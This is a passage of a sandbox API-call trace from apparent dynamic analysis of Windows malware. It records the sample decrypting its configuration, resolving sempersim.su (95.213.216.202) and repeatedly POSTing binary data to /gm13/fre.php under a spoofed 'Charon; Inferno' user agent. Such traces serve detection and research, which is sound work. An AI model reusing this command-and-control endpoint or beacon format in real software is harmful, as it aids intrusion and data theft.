(lpLibFileName="ADVAPI32") returned 0x77420000 [0270.435] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.435] GetProcessHeap () returned 0x620000 [0270.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0270.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0270.436] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642fc0, pdwDataLen=0x19fcfc | out: pbData=0x642fc0, pdwDataLen=0x19fcfc) returned 1 [0270.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0270.440] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0270.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0270.441] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0270.441] GetProcessHeap () returned 0x620000 [0270.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x644fb8 [0270.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0270.442] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0270.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0270.442] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0270.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0270.443] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0270.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0270.444] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0270.444] GetProcessHeap () returned 0x620000 [0270.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0270.444] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0270.445] GetProcessHeap () returned 0x620000 [0270.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0270.445] GetProcessHeap () returned 0x620000 [0270.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644fb8 | out: hHeap=0x620000) returned 1 [0270.446] GetProcessHeap () returned 0x620000 [0270.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642fc0 | out: hHeap=0x620000) returned 1 [0270.446] GetProcessHeap () returned 0x620000 [0270.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6431b8 [0270.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0270.447] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0270.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0270.459] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0270.468] GetProcessHeap () returned 0x620000 [0270.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0270.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0270.469] CryptImportKey (in: hProv=0x63bcb0, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0270.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0270.470] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0270.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0270.470] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.470] GetProcessHeap () returned 0x620000 [0270.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0270.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0270.472] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6431b8, pdwDataLen=0x19fcfc | out: pbData=0x6431b8, pdwDataLen=0x19fcfc) returned 1 [0270.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0270.473] CryptDestroyKey (hKey=0x62d190) returned 1 [0270.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0270.473] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0270.473] GetProcessHeap () returned 0x620000 [0270.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646320 [0270.474] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0270.474] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0270.475] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0270.475] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0270.476] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0270.476] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0270.476] GetProcessHeap () returned 0x620000 [0270.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0270.476] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c2a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec70*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0270.479] GetProcessHeap () returned 0x620000 [0270.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b590 [0270.479] socket (af=2, type=1, protocol=6) returned 0x404 [0270.479] connect (s=0x404, name=0x63ec70*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0270.530] FreeAddrInfoW (pAddrInfo=0x63c2a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec70*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0270.530] GetProcessHeap () returned 0x620000 [0270.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0270.530] GetProcessHeap () returned 0x620000 [0270.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0270.531] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0270.532] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0270.532] GetProcessHeap () returned 0x620000 [0270.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0270.532] GetProcessHeap () returned 0x620000 [0270.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0270.533] GetProcessHeap () returned 0x620000 [0270.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643488 [0270.533] GetProcessHeap () returned 0x620000 [0270.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0270.533] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0270.534] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0270.534] GetProcessHeap () returned 0x620000 [0270.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0270.534] GetProcessHeap () returned 0x620000 [0270.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0270.535] send (s=0x404, buf=0x63a880*, len=237, flags=0) returned 237 [0270.535] send (s=0x404, buf=0x6421e0*, len=159, flags=0) returned 159 [0270.536] GetProcessHeap () returned 0x620000 [0270.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0270.536] recv (in: s=0x404, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0272.042] GetProcessHeap () returned 0x620000 [0272.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0272.043] GetProcessHeap () returned 0x620000 [0272.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0272.043] GetProcessHeap () returned 0x620000 [0272.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0272.043] GetProcessHeap () returned 0x620000 [0272.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0272.044] closesocket (s=0x404) returned 0 [0272.045] GetProcessHeap () returned 0x620000 [0272.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b590 | out: hHeap=0x620000) returned 1 [0272.045] GetProcessHeap () returned 0x620000 [0272.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646320 | out: hHeap=0x620000) returned 1 [0272.045] GetProcessHeap () returned 0x620000 [0272.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6431b8 | out: hHeap=0x620000) returned 1 [0272.045] GetProcessHeap () returned 0x620000 [0272.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0272.046] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc34) returned 0x404 [0272.047] Sleep (dwMilliseconds=0xea60) [0272.064] GetProcessHeap () returned 0x620000 [0272.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6435f0 [0272.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0272.065] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0272.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0272.076] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0272.084] GetProcessHeap () returned 0x620000 [0272.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0272.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0272.085] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0272.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0272.086] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0272.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0272.087] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.087] GetProcessHeap () returned 0x620000 [0272.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0272.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0272.094] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6435f0, pdwDataLen=0x19fcfc | out: pbData=0x6435f0, pdwDataLen=0x19fcfc) returned 1 [0272.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0272.095] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0272.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0272.095] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0272.095] GetProcessHeap () returned 0x620000 [0272.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x6460f8 [0272.096] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0272.096] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0272.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0272.097] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0272.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0272.098] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0272.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0272.099] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0272.099] GetProcessHeap () returned 0x620000 [0272.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0272.099] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0272.099] GetProcessHeap () returned 0x620000 [0272.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0272.100] GetProcessHeap () returned 0x620000 [0272.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6460f8 | out: hHeap=0x620000) returned 1 [0272.100] GetProcessHeap () returned 0x620000 [0272.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6435f0 | out: hHeap=0x620000) returned 1 [0272.101] GetProcessHeap () returned 0x620000 [0272.101] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643170 [0272.102] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0272.103] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0272.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0272.116] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0272.146] GetProcessHeap () returned 0x620000 [0272.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0272.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0272.147] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0272.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0272.148] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0272.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0272.149] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.149] GetProcessHeap () returned 0x620000 [0272.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0272.150] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0272.150] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643170, pdwDataLen=0x19fcfc | out: pbData=0x643170, pdwDataLen=0x19fcfc) returned 1 [0272.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0272.154] CryptDestroyKey (hKey=0x62d710) returned 1 [0272.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0272.155] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0272.155] GetProcessHeap () returned 0x620000 [0272.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645858 [0272.155] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0272.156] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0272.156] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0272.157] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0272.157] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0272.157] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0272.157] GetProcessHeap () returned 0x620000 [0272.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0272.157] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c5c8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0272.160] GetProcessHeap () returned 0x620000 [0272.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b650 [0272.160] socket (af=2, type=1, protocol=6) returned 0x408 [0272.160] connect (s=0x408, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0272.215] FreeAddrInfoW (pAddrInfo=0x63c5c8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0272.215] GetProcessHeap () returned 0x620000 [0272.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba90 [0272.216] GetProcessHeap () returned 0x620000 [0272.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0272.218] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0272.222] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0272.222] GetProcessHeap () returned 0x620000 [0272.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0272.223] GetProcessHeap () returned 0x620000 [0272.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0272.224] GetProcessHeap () returned 0x620000 [0272.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6434d0 [0272.225] GetProcessHeap () returned 0x620000 [0272.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0272.226] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0272.229] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0272.235] GetProcessHeap () returned 0x620000 [0272.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0272.235] GetProcessHeap () returned 0x620000 [0272.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0272.236] send (s=0x408, buf=0x63a880*, len=237, flags=0) returned 237 [0272.240] send (s=0x408, buf=0x6421e0*, len=159, flags=0) returned 159 [0272.241] GetProcessHeap () returned 0x620000 [0272.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0272.241] recv (in: s=0x408, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0273.458] GetProcessHeap () returned 0x620000 [0273.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0273.459] GetProcessHeap () returned 0x620000 [0273.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6434d0 | out: hHeap=0x620000) returned 1 [0273.460] GetProcessHeap () returned 0x620000 [0273.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0273.460] GetProcessHeap () returned 0x620000 [0273.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba90 | out: hHeap=0x620000) returned 1 [0273.461] closesocket (s=0x408) returned 0 [0273.463] GetProcessHeap () returned 0x620000 [0273.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b650 | out: hHeap=0x620000) returned 1 [0273.463] GetProcessHeap () returned 0x620000 [0273.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645858 | out: hHeap=0x620000) returned 1 [0273.463] GetProcessHeap () returned 0x620000 [0273.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643170 | out: hHeap=0x620000) returned 1 [0273.464] GetProcessHeap () returned 0x620000 [0273.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0273.464] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc38) returned 0x408 [0273.466] Sleep (dwMilliseconds=0xea60) [0273.479] GetProcessHeap () returned 0x620000 [0273.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642e10 [0273.480] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0273.481] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0273.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0273.489] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0273.499] GetProcessHeap () returned 0x620000 [0273.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0273.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0273.500] CryptImportKey (in: hProv=0x63ba08, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0273.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0273.501] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0273.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0273.502] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0273.502] GetProcessHeap () returned 0x620000 [0273.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0273.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0273.503] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642e10, pdwDataLen=0x19fcfc | out: pbData=0x642e10, pdwDataLen=0x19fcfc) returned 1 [0273.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0273.504] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0273.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0273.508] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0273.508] GetProcessHeap () returned 0x620000 [0273.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x6451e0 [0273.508] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0273.509] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0273.509] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0273.509] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", 